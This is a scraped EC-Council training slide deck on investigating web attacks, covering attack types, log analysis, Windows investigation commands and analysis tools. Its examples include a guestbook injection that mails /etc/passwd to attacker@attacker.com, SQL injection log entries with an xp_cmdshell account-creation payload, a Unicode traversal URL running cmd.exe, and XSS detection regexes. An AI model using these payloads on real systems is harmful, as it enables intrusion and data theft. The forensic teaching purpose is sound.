Contenu connexe
Similaire à File000143 (20)
Plus de Desmond Devendran
Plus de Desmond Devendran (20)
File000143
- 2. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News: Web Application Hacks -
Upping The Arms Race
Source: http://www.informationweek.com/
- 3. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News: Mystery Web Attack Hijacks
Your Clipboard
Source: http://www.theregister.co.uk/
- 4. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News: Georgian Web Attacks are
the Work of Kids
Source: http://www.theinquirer.net/
- 5. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Scenario
Three Russian citizens were charged of extorting money from U.K.’s e-commerce
companies on October 4, 2006. Ivan Maksakov, Alexander Petrov, and Denis Stepanov
were accused of receiving $4 million from UK firms. The trio concentrated on U.K.’s
Internet gambling sites collecting information about British web casinos and
bookmakers’ offices using spy software designed by one of the members and then
demanded ransoms from the owners of such websites by threatening them of Denial-
of-Service attacks.
In their six months activity, the accused attacked over 54 web servers in 30 different
countries. The U.K. National Hi-Tech Crime Unit (NHTCU) and the Russian
authorities investigated this case and arrested them.
- 6. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Case Study: Word Flaw Hit With
Zero-Day Attack
- 7. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Module Objective
• Indications of a Web Attack
• Types of Web Attacks
• Overview of Web Logs
• Investigation of Web Attack
• Investigation of FTP Servers
• Investigation of IIS Logs
• Investigation of Web Attacks in Windows-based Servers
• Web page Defacement
• Investigation of DNS Poisoning
• Investigation of Static and Dynamic IP address
• Checklist for Security to Web attacks
• Tools for Web Attack Investigations
This module will familiarize you with:
- 8. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Module Flow
Indications of a Web Attack
Types of Web Attacks
Overview of Web Logs
Investigation of Web Attacks
Investigation of FTP Servers
Investigation of IIS Logs
Investigation of Web Attacks in
Windows-based Servers
Web page Defacement
Investigation of DNS Poisoning
Investigation of Static and
Dynamic IP Address
Checklist for Security to
Web Attacks
Tools for Web Attack
Investigations
- 9. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Indications of a Web Attack
Customers reporting to an organization that they are not able to access its online service
A legitimate web page being redirected to an unknown website
Frequent rebooting of the server
Anomalies found in the log files
- 10. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Types of Web Attacks
Cross-Site Scripting (XSS) Attack
Cross-Site Request Forgery (CSRF)
SQL Injection
Code Injection
Command Injection
Parameter Tampering
Cookie Poisoning
Buffer Overflow
Cookie Snooping
- 11. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Types of Web Attacks (cont’d)
DMZ Protocol Attack
Zero Day Attack
Authentication Hijacking
Log Tampering
Web Services Attack
Directory Traversal
Cryptographic Interception
URL Interpretation
Impersonation Attack
- 12. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Cross-Site Scripting (XSS)
Cross Site Scripting (XSS or CSS) is an application layer hacking technique
It occurs when a dynamic web page collects malicious data from a user and
displays the input on the page without it being properly validated
Cross Site Scripting allows an attacker to embed malicious JavaScript,
VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page and trick
the user to execute the script on his machine in order to gather data
The use of XSS might compromise private information, manipulate or steal
cookies, create requests that can be mistaken for those of a valid user, or
execute malicious code on the end-user systems
- 13. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Cross-Site Scripting (XSS)
The regular expression below checks for attacks that may contain HTML opening
and closing tags (<>) with any text inside, and their hex equivalents
•/((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/ix
•((%3C)|<) - check for opening angle bracket or hex equivalent
•((%2F)|/)* - the forward slash for a closing tag or its hex equivalent
•[a-z0-9%]+ - check for alphanumeric string inside the tag, or hex
representation of these
•((%3E)|>) - check for closing angle bracket or hex equivalent
Regular Expression for simple CSS attack:
•Alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"NII Cross-site scripting attempt";
flow:to_server,established;
•pcre:"/((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/i";
classtype:Web-application-attack; sid:9000; rev:5;)
Snort signature:
- 14. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Cross-Site
Scripting (XSS) (cont’d)
Regular expression for "<img src" CSS attack:
•/((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^n]+((%3E)
|>)/I(%3C)|<) – checks opening angled bracket or hex equivalent
•(%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47) - checks the letters 'img' in varying
combinations of ASCII, or upper or lower case hex equivalents
•[^n]+ - checks any character other than a new line following the <img
•(%3E)|>) - closing angled bracket or hex equivalent
Paranoid regex for CSS attacks:
•/((%3C)|<)[^n]+((%3E)|>)/I
• It simply looks for the opening HTML tag, and its hex equivalent, followed by one or more characters
other than the newline, and then followed by the closing tag or its hex equivalent
- 15. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Cross-Site Request Forgery (CSRF)
Attacker forces the victim to submit his form data to the victim’s
web server
Attacker takes an arbitrary action as soon as the victim takes
preventive measures against the web site
It targets the images that are generally found on Internet forums
• Exploit site's trust in a user
• Involve sites that rely on the user's identity
• Trick a user into sending HTTP requests to a site
• Involve HTTP requests that has side-effects
It can:
- 16. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Anatomy of CSRF Attack
• Attacker hosts a web page with pre-
populated HTML form data
Step 1
• Victim browses the attacker’s HTML
form
Step 2
• Web page automatically submits that
pre-populated form data to a site where
the victim has access
Step 3
• Site authenticate request (attacker’s
form data) come from victims
Step 4
• Attacker’s form data is accepted by the
server since it was sent from a
legitimate user
Result
- 17. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Pen-Testing CSRF Validation Fields
• Verify that the validation field is unique for each user
Test 1
• Verify that the validation field cannot be determined by other users
• If an attacker can create same validation field for another user, there is
no value in the validation field
• Validation field must be unique for each site
Test 2
• Verify that the validation field is never sent on the query string
• This data could be leaked in places like HTTP referrer to attacker
Test 3
• Verify request fails when validation field is missing
Test 4
- 18. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection Attacks
SQL injection is a type of security exploit in which the attacker adds
SQL code to a Web form input box to gain access to the database
resources
For example, in a search page, the developer may execute a query
(VBScript/ASP) using the code :
•Set myRecordset = myConnection.execute("SELECT * FROM
myTable WHERE someText ='" & request.form("inputdata") &
"'")
If a code like “blah or 1=1 –” is used as an input in the search
page, it will produce the code in the ASP:
•Set myRecordset = myConnection.execute("SELECT * FROM
myTable WHERE someText ='" & blah or 1=1 -- & "'")
• The above statement always comes to be true and returns the recordset
- 19. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating SQL Injection Attacks
• IDS log files
• Database server log files
• Web server log files
Look for SQL Injection attack incidents in these
locations:
•12:34:35 192.2.3.4 HEAD GET
/login.asp?username=blah’ or 1=1 –
•12:34:35 192.2.3.4 HEAD GET
/login.asp?username=blah’ or )1=1 (--
•12:34:35 192.2.3.4 HEAD GET
/login.asp?username=blah’ or exec
master..xp_cmdshell 'net user test testpass --
The attack signature may look like:
- 20. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News: SQL Injection Attacks Against
Databases Rise Sharply
Source: http://computerworld.com/
Info-theft attempts up nearly 40-fold since beginning of year
- 21. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Code Injection Attack
Code Injection attack is similar to an SQL injection, but instead of SQL
command, attackers pass other types of malicious codes like PHP script
and shell commands to the web form input box of an application
The purpose of the injected code is to bypass or modify the intended
functionality of the program
In this attack, arbitrary code is executed on the target server
• Example: A web server has a “Guest book “script which receives the small
messages like
• It is nice site!
• Attacker may insert a message “; cat /etc/passwd | mail
attacker@attacker.com #” which steals the password from web server
and e-mails to the attacker
- 22. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Code Injection Attack
Executable instruction detector in an Intrusion Detection System (IDS) and a
series of sandbox execution environments provided by OS in the network are
used to detect the code injection attacks
IDS identifies the series of executable instructions and sends the suspicious
packet’s payload to the executable environment matching the packet destination
The proper execution environment is determined by examining the destination’s
IP address of the incoming packet
The payload is executed in the corresponding monitored environment and a
report containing the payload’s OS resource usage is returned to the IDS
If a report contains evidence of the resource ‘s usage then IDS generates the
alerts, otherwise the packet is considered as non-malicious
- 23. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Parameter Tampering
Parameter tampering is a form of web attack where certain parameters in the URL entered
by a user are changed during exchange between the client and the web server without the
user's authorization
By modifying the arguments (parameters) in the query, the attacker can navigate through
the web and database servers and retrieve or modify there contents
- 24. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Cookie Poisoning
Cookie poisoning attacks involve the modification of the contents of a cookie in order to
steal personal information of a user
Cookies stored on the computer's hard drive maintain bits of information that allow web
sites to authenticate the users’ identity, speed up transactions, monitor behavior, and
personalize web services
Stolen personal information is generally used for other malicious attacks such as identity
theft and online frauds
- 25. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Cookie Poisoning Attack
Trace the cookies set commands issued by the web server, and store information such as cookie name,
cookie value, IP address, and the session to which that cookie was assigned
Intercepts each HTTP request sent to the web server, retrieves the cookie information out of it, and
checks it against all stored cookies
Change in the contents of a cookie determines that the attacks has occurred
Attacker
Attacker sends an
invalid cookies to
server
server
- 26. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Buffer Overflow/Cookie Snooping
• Buffer overflow is the result of writing more data into a buffer
than the buffer can hold
• In such attacks, the extra data may contain codes designed to
trigger specific actions, sending new instructions to the attacked
computer that damage the user's files, change data, or disclose
confidential information
• Attackers attempt to overflow vulnerable backend servers with
excess requests, and attackers can often execute commands
directly on the compromised server
Buffer Overflow:
• Attacker decodes the user’s credentials, and logs on as an
authorized user and gains access to the sensitive information
Cookie snooping:
- 27. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Detecting Buffer Overflow
Nebula (NEtwork-based BUffer overfLow Attack detection)
technique detects buffer overflow attacks based solely on the traffic
observed without requiring any modifications to the end hosts
Nebula uses a generalized signature that can capture all known
variants of buffer overflow attacks while reducing the number of false
positives to a negligible level
- 28. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
DMZ Protocol Attack/ Zero Day
Attack
• Most web applications include protocols such as DNS and FTP; these
protocols have many inherent vulnerabilities and are exploited to gain
access to other critical applications
DMZ Protocol Attack
• It refers to the exploits that take advantage of a newly discovered
vulnerability in a program or operating system before the software
developer finds a solution for that vulnerability
Zero day Attack:
- 29. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Authentication Hijacking
Authentication prompts a user to supply the credentials
that allow access to the application
Enforcing a consistent authentication policy between
multiple and disparate applications can prove to be a real
challenge
An authentication hijacking can lead to theft of service,
session hijacking, and user impersonation
- 30. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Authentication Hijacking
Check if the browser remembers the password (a common mistake that
most of the users do while selecting ‘password remember’ options)
Look if the user did not log off from the application
- 31. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Log Tampering
Logs are kept to track the usage patterns of the application
Log tampering allows attackers to cover their tracks or
alter web transaction records
Attackers tries to delete logs, modify logs, change user
information, or otherwise destroy evidence of any attack
- 32. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Directory Traversal
Direct traversal occurs when the attacker is able to browse directories
and files outside the normal application access
Attack exposes the directory structure of the application, and often
the underlying web server and the operating system
Attacker can enumerate contents, access secure or restricted pages,
and gain confidential information, and locate the source’s code
- 33. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Cryptographic Interception
Using cryptography, confidential message scan be securely exchanged between two
parties
Encrypted traffic flow through network firewalls and IDS systems is not inspected
Attacker takes advantage of a secure channel, to exploit it more efficiently than an open
channel
- 34. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
URL Interpretation and
Impersonation Attack
• Web server failing to parse correct URL is termed as URL interpretation
• Example: Unicode or superfluous decode attacks
URL Interpretation
• Impersonation attack is the attack where an attacker spoofs web
applications by pretending to be a legitimate user
Impersonation Attack
- 35. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Overview of Web Logs
Log files come handy in detecting web attacks
The source, nature, and time of the attack can be determined by analyzing log files of the compromised
system
Log files have HTTP status codes that are specific to the type of incidents
Web servers that run on IIS or Apache are prone to log file deletion by attackers who has access to the web
server as log files are stored on the web server itself
- 36. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Web Attacks
1.
• Analyze web server, ftp, and local system logs to confirm a web attack
2.
• Check log file information with respect to time/time stamps, IP address, HTTP status code,
and requested resource
3.
• Identify the nature of the attack. Is it a DDoS attack, or an attack targeted just at you? Is
someone trying to shut down your network altogether, or attempting to infiltrate individual
machines?
4.
• Localize the source
5.
• Use your firewall and IDS logs to know where the attack is coming from (or came from!)
6.
• This will help you identify whether the attack/penetration is coming from a compromised
host on your network or from the outside world
- 37. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Web Attacks (cont’d)
7.
• Block the attack
8.
• Once you know where the attack is coming from, you can take action to
stop it
9.
• If you have identified specific machines that have been compromised,
pull them from the network until you can disinfect them and return them
to service
10.
• If an attack or attempted attack is coming from outside, block access to
the network from that IP address
11.
• START YOUR INVESTIGATION – from the IP address!
- 38. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Example of FTP Compromise
#nmap -0 23.3.4.5 –p 21
Starting nmap Interesting ports
Port State Service
21/tcp open ftp
80/tcp open www
Remote OS is Windows 2000
ftp 23.3.4.5
Connected to 23.3.4.5
Username:administrator
Password:
Attacker runs port scanning:
The attacker connects using ftp
- 39. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating FTP Logs
The FTP logs in a Windows 2000 are stored in the directory:
•C:WINDOWSsystem32LogFilesMSFTPSVC1
Screenshot of an FTP log:
- 40. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating FTP Servers
FTP server vulnerabilities allow an attacker to directly compromise
the system hosting the FTP server
Direct compromise of an FTP server can be as simple as obtaining
legitimate passwords by:
• Social engineering
• Brute-force guessing
• Network sniffing
Network and FTP logs provide valuable records that can provide
valuable evidence
- 41. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating IIS Logs
IIS logs all the visits in log files. The log file is located at
<%systemroot%>logfiles
If proxies are not used, then IP can be logged
This command lists the log files:
• http://victim.com/scripts/..%c0%af../..%c0%af../..
%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%a
f../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:W
inntsystem32LogfilesW3SVC1.
- 42. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Apache Logs
• The Apache server saves diagnostic information and error messages that it
encounters while processing requests
• The default path of this file is usr/local/apache/logs/error_log in Linux
• It is an important piece of evidence from the investigator’s point of view
• [Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host
header
Error log:
• It contains requests processed by the Apache server
• By default, access logs are stored in the common log format
• The default path of this file is usr/local/apache/logs/access_log in Linux
• 202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0"
200 1577
Access log:
The Apache server has two logs, namely:
- 43. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Web Attacks in
Windows-based Servers
Look for a large number of failed logon attempts or locked out accounts
•C:> eventvwr.msc
Run event viewer to look at logs:
• Event log service stops
• Windows File Protection is not active on the system
• The MS Telnet Service started successfully
Check if the following suspicious events have occurred:
- 44. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Web Attacks in
Windows-Based Servers (cont’d)
•C:> net view 127.0.0.1
Look at file shares and ensure that each of them has a defined
business purpose
•C:> net session
Look at who has an open session with the system
•C:> net use
Look at which sessions the machine has opened with other
systems
•C:> nbtstat –S
Look at NetBIOS over TCP/IP activity
•C:> netstat –na
Look for unusual listening TCP and UDP ports
- 45. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Web Attacks in
Windows-based Servers (cont’d)
•C:> at
Look for unusual tasks on the local host such as running as user
on administrator’s group as system by
•C:> lusrmgr.msc
Look for new accounts in the administrator’s group
Look for unexpected processes by running task manager
•C:> net start
Look for unusual network services
•C:> dir
Check file space usage to look for sudden decrease in free space
- 46. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Page Defacement
• Attacker convinces the legitimate user to perform an action (i.e., giving
away credentials) that may help in attack
• Luring the legitimate user (insider) and gaining credentials
• Exploiting implementation and design errors
Attacking techniques:
Unauthorized modification to a web page leads to web page defacement
- 47. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Page Defacement (cont’d)
Web page defacement requires write access privileges in web
server root directory
The compromise could come from any security vulnerability
such as Unicode and RPC
• Weak administrator password
• Application misconfiguration
• Server misconfigurations
• Accidental permission assignments
The web page defacements are the
results of:
- 48. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Defacement Using DNS Compromise
The attacker can compromise the authoritative domain name server for the web
server by redirecting DNS requests for a website to his defaced website
• Webserver DNS entry
• www.example.com 192.2.3.4
• Compromised DNS entry by the attacker
• www.example.com 10.0.0.3
• Now all requests for www.example.com will be redirected to 10.0.0.3
- 49. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating DNS Poisoning
If you notice that DNS cache has been corrupted, then dump the
contents of the DNS server’s cache to look for inappropriate
entries
On Linux systems, use the BIND command:
• #ndc dumpdb
• Database dump initiated
You can enable DNS logging in named.conf but it will slow down
the performance of the DNS server
- 50. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Intrusion Detection
Intrusion Detection is the art of detecting inappropriate, incorrect, or
anomalous activity
It can be used to determine if a computer network or server has
experienced an unauthorized intrusion
• Host-based Intrusion Detection Systems (HIDS) :
• IDS systems that operate on a host to detect malicious activity on that host
• Network -based Intrusion Detection Systems (NIDS):
• IDS systems that operate on network data flows
• Intrusion Prevention System (IPS):
• This is a system that actively monitors a network or host for attacks and
prevents those attacks from occurring
Types of Intrusion Detection:
- 51. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Strategies for Securing Web
Applications
• Driving ideas for detection of vulnerabilities
• Fixing the earlier occurred vulnerabilities
• Pen-testing the application as it avoids time for research on vulnerabilities
and analyzing results
• Checking for flaws in security through IDS and IPS tools
• Improving awareness of good security
Strategies for securing web applications:
@
- 52. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Investigating Static and Dynamic IP
Addresses
Static IP address of a particular host can be found with the help of tools
such as NSlookup, Whois, Traceroute, ARIN, and NeoTrace
The DHCP server allocates dynamic IP address to the hosts on a network
The DHCP log file stores information regarding the IP address allocated
to a particular host at a particular time
- 53. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Checklist for Web Security
Avoid user accounts having weak or no password
Block unused open ports
Check for various web attacks
Test if Unicode vulnerability is prevailing
Check whether IDS or IPS is deployed
Look for possible intrusion areas using vulnerability scanner
Test the website to check whether it can handle large loads and SSL if it is an e-commerce website
Document the list of techniques, devices, policies, or necessary steps that offer security
- 55. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Statistics 2005-2007 (cont’d)
- 57. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Dotdefender
http://www.applicure.com/
Dotdefender is a web application attack protection tool that blocks
attacks that are manifested within the HTTP request logic such as:
• SQL Injection - dotDefender intercepts and blocks attempts to inject SQL
statements that corrupt or gain access to the corporate data
• Proxy Takeover - dotDefender intercepts and blocks attempts to divert traffic to
an unauthorized site
• Cross-site Scripting - dotDefender intercepts and blocks attempts to inject
malicious scripts that hijack the machines of the subsequent site visitors
• Header Tampering - dotDefender identifies and blocks requests containing
corrupted header data
• Path Traversal - dotDefender blocks attempts to navigate through the host's
internal file system
• Probes - dotDefender detects and blocks attempts to ferret the system ‘s
information
• Known Attacks - dotDefender recognizes and blocks attacks bearing known
signatures
- 59. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
AccessDiver
http://www.accessdiver.com
- 61. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Log Analyzer: Server Log Analysis
http://www.w3.org/
Server log analysis analyzes server logs by changing the numeric Internet node numbers into
domain names with the help of httpd-analyse.c
httpd-analyse.c is the program that helps the server log analysis tool to perform its
function
• A version of the log file with the document name is simplified (if necessary)
• IP address is turned into DNA name form
Output:
- 62. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
Analog is a program which analyzes logfiles
from WWW servers that can be installed directly
on a virtual server
Deep Log Analyzer is an advanced web
analytics solution for small and medium
size websites
- 63. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
AWStats is a free web analysis tool that works as a
CGI script on the web server or from the command line
that generates advanced web, streaming, ftp or mail
server statistics, graphically
WebLog Expert is an access log analyzer which
gives the information about the site's visitors
such as activity statistics, accessed files, and
paths through the site, browsers
- 64. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
AlterWind Log Analyzer Professional is unique
web log analysis software
Webalizer is a web server log file analysis
program that produces usage statistics in HTML
format for viewing with a browser
- 65. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
eWebLog Analyzer is a web server log analyzer that
gives you vital information about your website’s usage
that can read log files of the most popular web servers,
including Microsoft IIS, Apache, and NCSA
N-Stealth 5 is a web vulnerability scanner that
scans over 18000 HTTP security issues stealth
HTTP Scanner writes scan results to an easy
HTML report
- 66. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
Acunetix scans website simulating numerous
hacking techniques such as SQL injection, cross site
scripting, and Google hacking, in order to identify
vulnerabilities in the website
Falcove is used by website owners to see whether
their websites are hackable or vulnerable to
attacks and to find vulnerabilities before attackers
do
Security audit report will show severity of web vulnerabilities found
- 67. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
AppScan provides security testing throughout the
application development lifecycle, which tests security
assurance in the development stage
Watchfire AppScan automates web application
security audits to ensure the security and
compliance of websites
- 68. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
Emsa Web Monitor is a small web monitoring
program that runs on the desktop and allows the user
to monitor uptime status of several websites
WebWatchBot is a monitoring and analysis
software for websites and IP devices including
Ping, HTTP, HTTPS, SMTP, POP3, FTP, Port, and
DNS checks
- 69. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
Paros is a Java based web applications security
assessment tool that is used to intercept and modify
all HTTP and HTTPS data between the server and the
client, including cookies and from fields
HP WebInspect performs web application
security testing and assessment for web
applications
- 70. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
KeepNI keeps an eye on the website’s
functionality and assures that your site is up
and fully functional every time
Wikto checks for flaws in webservers and
also offers web-based vulnerability scanning
- 71. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
Mapper maps the files, file parameters, and values of any site
you wish to test and browses the site as a normal user while
recording the session with Achilles (Mapper supports other
proxies as well), and runs Mapper on the resulting log file
N-Stalker, a web application security scanner offers a
complete suite of web security assessment checks to
enhance overall security of web applications against
vulnerabilities and attacks
- 72. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
Scrawlr is a HP tool that makes a website to crawl
and audits it for SQL Injection vulnerabilities
Exploit-Me is a suite of Firefox web application
security testing tools that integrates directly with
Firefox and tests vulnerabilities related to web
applications
- 73. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Web Attack Investigation Tools
(cont’d)
WebAgain protects a website and automatically repairs the content
damaged by attackers
UV Uptime Website Defacement Detector detects the
defacement to website
- 74. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tools for Locating IP Address
- 75. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tools for Locating IP Address
Hide Real IP is the tool used to hide the IP address
for anonymous Internet access, fake IP appears
instead of real IP address
whatismyip is a tool to recognize the real
Internet IP address
- 76. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tools for Locating IP Address
(cont’d)
IP Detective Suite is an IP monitoring program that
reports the changing IP address to user’s ftp site or to
an e-mail address
Enterprise IP - Address Manager is an
application for assigning, cataloging, and
maintaining IP addresses and host data for both
registered and private TCP/IP addressed networks
- 77. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tools for Locating IP Address
(cont’d)
Whois Lookup is an online tool for obtaining
information about any website
SmartWhois is a useful network information
utility that allows you to look up all the available
information about an IP address, hostname, or
domain
- 78. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tools for Locating IP Address
(cont’d)
ActiveWhois is a network tool to find any
information about an IP address or Internet domain
LanWhois is a program that helps you find out
who, where, and when registered the domain or
site you are interested in
- 79. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Nslookup
Nslookup is a program to query Internet domain name servers. Displays
information that can be used to diagnose Domain Name System (DNS)
infrastructure
Helps to find additional IP addresses if authoritative DNS is known from
whois
MX record reveals the IP of the mail server
Both Unix and Windows come with an Nslookup client
Third party clients are also available – E.g. Sam Spade
- 81. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Traceroute
http://www.traceroute.org/
Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To
Live
It reveals the path IP packets travel between two systems by sending out consecutive UDP
packets with ever-increasing TTLs
As each router processes an IP packet, it decrements the TTL. When the TTL reaches zero, it
sends back a "TTL exceeded" message (using ICMP) to the originator
Routers with DNS entries reveal the name of routers, network affiliation, and geographic
location
- 82. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Tools for Locating IP Address:
NeoTrace (Now McAfee Visual Trace)
NeoTrace shows the
traceroute output
visually – map view,
node view and IP view
- 83. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Whois
http://www.whois.net/
Whois is the client utility that
communicates with WHOIS servers located
around the world to obtain information
about domain registration
It supports IP address queries and
automatically selects the appropriate
Whois server for IP addresses
- 84. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Whois
Registrant:
targetcompany (targetcompany-DOM)
# Street Address
City, Province
State, Pin, Country
Domain Name: targetcompany.COM
Domain servers in listed order:
NS1.WEBHOST.COM XXX.XXX.XXX.XXX
NS2.WEBHOST.COM XXX.XXX.XXX.XXX
Administrative Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
Technical Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
- 85. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
CountryWhois
http://www.tamos.com/
CountryWhois is a utility for identifying the geographic location of an
IP address
It is similar to that of SmartWhois where the focus is on IP-to-
country identification
• It analyzes server logs
• It checks email headers
• It identifies online credit card fraud
Features:
- 87. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
IP2country
http://www.ip2country.org/
IP2country identifies visitor's geographical location i.e., country,
region, city and ISP, using a proprietary IP address lookup database
• Real time IP geo-location detection
• Redirects web pages based on geographical region
• Fraud detection (credit card fraud etc.)
• Web log statistics and analysis
• Spam filtering
Features:
- 89. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
CallerIP
